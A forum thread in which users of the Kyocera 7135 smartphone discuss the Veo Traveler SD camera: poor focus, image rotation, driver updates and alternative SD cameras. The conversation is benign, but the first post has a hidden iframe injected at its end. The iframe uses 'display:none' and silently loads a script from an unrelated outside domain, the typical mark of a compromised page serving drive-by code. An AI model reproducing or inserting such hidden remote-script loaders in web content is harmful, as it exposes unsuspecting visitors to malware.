+ Reply to Thread

Do you like your Veo camera?

I just got one and I find that I have to keep turning the phone to get the picture right side up. I am also still making adjustments to get a sharp picture. How about you?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Focusing the camera is definitely a challenge, even compared to the cheapest of the cheap digital cameras.

I believe there was a 7135 patch for it that fixed the screen rotation...check the Veo site.

Re: Do you like your Veo camera?

As a toy, it's OK, I guess. As a camera able to provide decent photos for general use, it fails miserably. Mine now has a home in the back of the drawer gathering dust, waiting for a better SD slot camera to come out.

Harumph!

VEO Camera

I am very Dissapointed with the Camera, I have to insert it several times and reset the phone to getit to work.

I returned mine to the store after 3 days. Poor focus and slow operation were the two main reasons.

As previously stated, the Veo site has software specific to the 7135 in their knowledge base at http://www.veo.com/Traveler_Palm/kb.asp .

Kupe

just went from 7135 to 6315.

veo camera

I like it, but i don't love it.

The focusing is difficult. I have the right software for it, and i switched from xmaster to tealmaster so the hacks can be shut off automatically when the veo program starts. I find that i don't hae trouble with it if i disable all of the hacks. Tealmaster seems to do this well.

I am using veotransfer to convert the pictures to jpg for emailing thru snappermail while i'm away from home.

If they fix the focus and give it a larger preview, it would be a lot more popular.

We need an sd camera with a flash. If someone would fix the focus / preview irritations and add a flash with it's own AAA battery to power it, i'd buy in. It would be ideal if there was a slot in the camera for the sd card to save photos direct.

Someone should just design a cable to go between a popular mini digital camera and the 7135 for emailing purposes so we could use a real camera.....

Why not buy a small digital camera that uses the SD format then you can insert the card into the 7135 and email and view the photos (with photo view that comes with photo suite)

TDS
    Originally posted by kupe
    I returned mine to the store after 3 days. Poor focus and slow operation were the two main reasons.

As previously stated, the Veo site has software specific to the 7135 in their knowledge base at http://www.veo.com/Traveler_Palm/kb.asp .

Kupe
    I went to the above web site, but they ask if yoiu have either Phone Software:MZ1.0.35; PDA Software: SZ1.0.23 or Phone Software:MZ1.0.27; PDA Software: SZ1.0.13. I have Phone Software:MZ1.0.44; PDA Software: SZ1.0.29??? Any ideas what application I should use for my 7135?

Thanks,
    TDS

SD Camera

I didnt like the Veo and went the SD camera route. However the smallest res I could find was 2 megapixel. The file is still to large to send in a reasonable time.

I really would like a 1 megapixel with SD, but cannot find one.

Cole

I agree...

When I first got it (for free) I was very excited about it.
    But now, I have finally come to grips with the fact that it sucks.
    Mine too is collecting dust in my overflowing, obsolete electronic gadgets junk box.

But, in case you are wondering, it is not available for anyone for what I paid for it.
    ~'kito
    pdaPhoneHome Moderator

Johnathen Lieber
    Just a fyi, LG has a new phone (wincp or whatever it is they are calling it now) that actually has a 1.1 megapixal camera...

Originally posted by Markito
    .....Mine too is collecting dust in my overflowing, obsolete electronic gadgets junk box.

My Veo rests comfortably next to my old Newton.

Veo to post new drivers

As a former Kodak PalmPic userI have been interestedin the Veo Traveler since first hearing about it. My expectations of the Veo are tempered by my experience with the PalmPic. The PalmPic pictures were adequate, but the geek factor was high. I expect the same from the Veo Traveler.

As the price if the Traveler is falling into the 60 dollar range I decided to check with Veo about new drivers for the 7135 44/29 configuration. Below is their response dated 10/24/03.

"Hello Bill,
    Thank you for contacting us. The Veo Traveler camera work with a Kyocera 7135 with the latest Kyocera software upgrades,the driver will be updated tomorrow.Please visit our website."

http://www.veo.com/

If you have a Veo and are having problems with it, you might want to download the new driver tomorrow.

Bill
    bcottun